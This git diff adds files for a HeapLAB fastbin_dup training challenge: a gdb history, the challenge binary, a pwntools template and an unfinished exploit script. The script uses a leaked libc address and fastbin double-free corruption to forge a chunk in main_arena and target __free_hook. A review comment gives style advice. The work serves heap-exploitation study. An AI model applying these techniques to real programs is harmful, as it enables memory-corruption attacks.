Diffstat (limited to 'HeapLAB/challenge-fastbin_dup')
-rw-r--r--HeapLAB/challenge-fastbin_dup/.gdb_history256
-rwxr-xr-xHeapLAB/challenge-fastbin_dup/bruh.py83
-rwxr-xr-xHeapLAB/challenge-fastbin_dup/fastbin_dup_2bin0 -> 15792 bytes
-rwxr-xr-xHeapLAB/challenge-fastbin_dup/pwntools_template.py60
4 files changed, 399 insertions, 0 deletions
diff --git a/HeapLAB/challenge-fastbin_dup/.gdb_history b/HeapLAB/challenge-fastbin_dup/.gdb_history
new file mode 100644
index 0000000..b2cbfcb
--- /dev/null
+++ b/HeapLAB/challenge-fastbin_dup/.gdb_history
@@ -0,0 +1,256 @@
+x &main_arena
+x/100x &main_arena
+print main_arena
+fastbins
+q
+fastbins
+fastbins
+c
+exit
+quit
+quit
+fastbins
+print main_arena
+q
+print main_arena
+q
+vis_heap_chunks
+print main_arena
+db main_arena
+db &main_arena
+db &main_arena/100
+db &main_arena 100
+db &main_arena 1000
+x main_arena.top
+x &main_arena.top
+db &main_arena 100
+c
+fastbins
+print main_arena
+x main_arena.fasbinsY
+x &main_arena.fastbinsY
+quit
+fastbins
+x 0x7f0946700b70
+db 0x7f0946700b70 100
+q
+fastbins
+q
+fastbins
+q
+fastbinsx
+db &main_arena 100
+q
+db 0x7f2e5c845b60
+0x7f2e5c845b70 + 16
+x 0x7f2e5c845b70 + 16
+x 0x7f2e5c845b70
+x 0x7f2e5c845b70
+x 0x7f2e5c845b60
+vis_heap_chunks
+db 0x7f0ba6e3db70
+db 0x555bdeaca000 100
+db 0x7f0ba6e3db70
+db 0x7f0ba6e3db70 - 8
+db 0x7f0ba6e3db70-8
+db 0x7f0ba6e3db70-7
+q
+x 0x7fcf882cbb69
+db 0x7fcf882cbb69
+q
+vis_heap_chunks
+print main_arena
+q
+print main_arena
+vis_heap_chunks
+q
+print main_arena
+q
+print main_arena
+fastbins
+r
+q
+r
+c
+fastbisn
+vis_heap_chunks
+fastbins
+quit
+fastbins
+print main_arena
+c
+print main_arena
+q
+print main_arena
+print main_arena
+x malloc_free_hook
+x __free_hook
+x &__free_hook
+x &__free_hook 100
+db &__free_hook 100
+q
+q
+q
+q
+print main_arena
+db 0x7f4858584e10
+c
+print victim
+q
+fastbins
+c
+x idx
+x chunksize(p)
+x chunksize
+x p
+fastbins
+q
+x __free_hook
+x &__free_hook 100
+db &__free_hook 100
+db &__free_hook - 100
+db &__free_hook-100
+db &__free_hook-100 100
+print main_arena
+x 0x7fca0f75fe10
+x/100 0x7fca0f75fe10
+x/100 0x7fca0f75fe10-100
+c
+q
+break malloc
+c
+fastbins
+x __free_hook
+fastins
+fastbins
+print main_arena
+x 0x7f072b59ee10
+break malloc
+break free
+continue
+c
+c
+c
+print main_arena
+vis_heap_chunks
+vis_heap_chunks
+c
+vis_heap_chunks
+break free
+break malloc
+c
+print main_arena
+x &__free_hook - 16
+q
+print main_arena
+vis_heap_chunks
+c
+c
+c
+q
+db __malloc_hook
+db &__malloc_hook
+x __malloc_hook
+x &__malloc_hook
+c
+break sysmalloc
+c
+frame 2
+context
+c
+break main
+c
+q
+x &__malloc_hook
+print __malloc_hook
+print &__malloc_hook
+print __main_arena
+print main_arena
+print main_arena
+x __malloc_hook
+x &__malloc_hook
+db &__malloc_hook
+db &__malloc_hook-100 100
+db &__malloc_hook-100 100*8
+db &__malloc_hook-100 (100*8)+1
+fastbins
+c
+print main_arena
+x __malloc_hook
+x &__malloc_hook
+db &__malloc_hook-100 (100*8)+1
+c
+db &__malloc_hook-100 (100*8)+1
+print main_arena
+x 0x7f5b07a18b40
+break malloc
+c
+c
+c
+q
+break __libc_malloc
+break malloc
+break __malloc_hook
+b __malloc_hook
+b &__malloc_hook
+b *__malloc_hook
+b *&__malloc_hook
+c
+delete 3
+c
+pwndbg heap
+vis_heap_chunks
+print __mallinfo
+x __mallinfo
+print &__mallinfo
+print *__mallinfo
+print __mallinfo
+print &__mallinfo
+print main_arena
+c
+break malloc
+c
+x main_arena.top_check
+x main_arena.top_chunk
+print main_arena
+x 0x7f4854db6b40
+x 0x7f4854db6b40
+x 0x7f4854db6b40
+c
+x 0x7f4854db6b40
+fastbins
+c
+x 0x7f4854db6b40
+c
+x 0x7f4854db6b40
+x main_arena
+x &main_arena
+x &__malloc_hook
+x main_arena.top
+db main_arena.top
+c
+c
+c
+q
+print __malloc_hook
+print __malloc_hook
+fastbins
+c
+fastbins
+c
+vis_heap_chunks
+c
+fastbins
+r
+c
+fastbins
+print main_arena
+vis_heap
+c
+fastbins
+fastbins
+c
+fastbins
+r
+c
+ quit
diff --git a/HeapLAB/challenge-fastbin_dup/bruh.py b/HeapLAB/challenge-fastbin_dup/bruh.py
new file mode 100755
index 0000000..191cbea
--- /dev/null
+++ b/HeapLAB/challenge-fastbin_dup/bruh.py
@@ -0,0 +1,83 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("fastbin_dup_2")
+libc = elf.libc
+
+context.terminal = ['kitty', 'bash', '-c']
+
+gs = '''
+continue
+'''
+def start():
+ if args.GDB:
+ return gdb.debug(elf.path, gdbscript=gs)
+ else:
+ return process(elf.path)
+
+# Index of allocated chunks.
+index = 0
+
+# Select the "malloc" option; send size & data.
+# Returns chunk index.
+def malloc(size, data):
+ global index
+ io.send("1")
+ io.sendafter("size: ", f"{size}")
+ io.sendafter("data: ", data)
+ io.recvuntil("> ")
+ index += 1
+ return index - 1
+
+# Select the "free" option; send index.
+def free(index):
+ io.send("2")
+ io.sendafter("index: ", f"{index}")
+ io.recvuntil("> ")
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+io.timeout = 0.1
+
+# =============================================================================
+
+#13 chunks
+
+chunk1 = malloc(24, 'abcd')
+chunk2 = malloc(24, 'abcc')
+
+free(chunk1)
+free(chunk2)
+free(chunk1)
+
+#malloc(24, p64(libc.sym.main_arena + 96))
+#this sets up a fake size field in the fastbins
+malloc(24, p64(0x81))
+malloc(24, 'asdf')
+malloc(24, 'asdf')
+
+chunk_b1 = malloc(119, 'asdf')
+chunk_b2 = malloc(119, 'asdf')
+
+free(chunk_b1)
+free(chunk_b2)
+free(chunk_b1)
+
+fake_chunk_loc = libc.sym.main_arena + 8 # begining of fastbin array
+
+malloc(119, p64(fake_chunk_loc))
+malloc(119, 'asdf')
+malloc(119, 'sdfg')
+
+#8 * 9
+
+malloc(119, p64(0)*9 + p64(libc.sym.__free_hook - 16))
+
+print(hex(fake_chunk_loc))
+
+# =============================================================================
+
+io.interactive()
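Review bot: The parameter of `free` is named `index`, shadowing the module-level `index` counter that `malloc` advances through `global index`; the same shadowing is in the copy of these helpers in pwntools_template.py. Renaming it avoids a silent mix-up if the counter is ever needed inside `free`: `def free(idx):` and `io.sendafter("index: ", f"{idx}")`. The helpers `start`, `malloc` and `free` are duplicated verbatim from pwntools_template.py, so any fix has to be applied twice; importing them from one shared module would keep the two scripts in step. `context.terminal = ['kitty', 'bash', '-c']` is a machine-local preference that belongs in the pwntools config or environment rather than a committed script, and the commented-out `malloc(...)` line above the `p64(0x81)` call is dead code that should be dropped. Presumably these scripts run under a pwntools release that accepts `str` payloads to `io.send`/`io.sendafter`; newer releases warn about non-bytes input, so `b"1"` and `b"2"` would be the safer literals.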
diff --git a/HeapLAB/challenge-fastbin_dup/fastbin_dup_2 b/HeapLAB/challenge-fastbin_dup/fastbin_dup_2
new file mode 100755
index 0000000..faa0249
--- /dev/null
+++ b/HeapLAB/challenge-fastbin_dup/fastbin_dup_2
Binary files differ
diff --git a/HeapLAB/challenge-fastbin_dup/pwntools_template.py b/HeapLAB/challenge-fastbin_dup/pwntools_template.py
new file mode 100755
index 0000000..1faaaf8
--- /dev/null
+++ b/HeapLAB/challenge-fastbin_dup/pwntools_template.py
@@ -0,0 +1,60 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("fastbin_dup_2")
+libc = elf.libc
+
+#gs = '''
+#continue
+#'''
+gs = '''
+break main
+'''
+def start():
+ if args.GDB:
+ return gdb.debug(elf.path, gdbscript=gs)
+ else:
+ return process(elf.path)
+
+# Index of allocated chunks.
+index = 0
+
+# Select the "malloc" option; send size & data.
+# Returns chunk index.
+def malloc(size, data):
+ global index
+ io.send("1")
+ io.sendafter("size: ", f"{size}")
+ io.sendafter("data: ", data)
+ io.recvuntil("> ")
+ index += 1
+ return index - 1
+
+# Select the "free" option; send index.
+def free(index):
+ io.send("2")
+ io.sendafter("index: ", f"{index}")
+ io.recvuntil("> ")
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+io.timeout = 0.1
+
+# =============================================================================
+
+# =-=-=- EXAMPLE -=-=-=
+
+# Request two 0x50-sized chunks.
+chunk_A = malloc(0x48, "A"*8)
+chunk_B = malloc(0x48, "B"*8)
+
+# Free the first chunk, then the second.
+free(chunk_A)
+free(chunk_B)
+
+# =============================================================================
+
+io.interactive()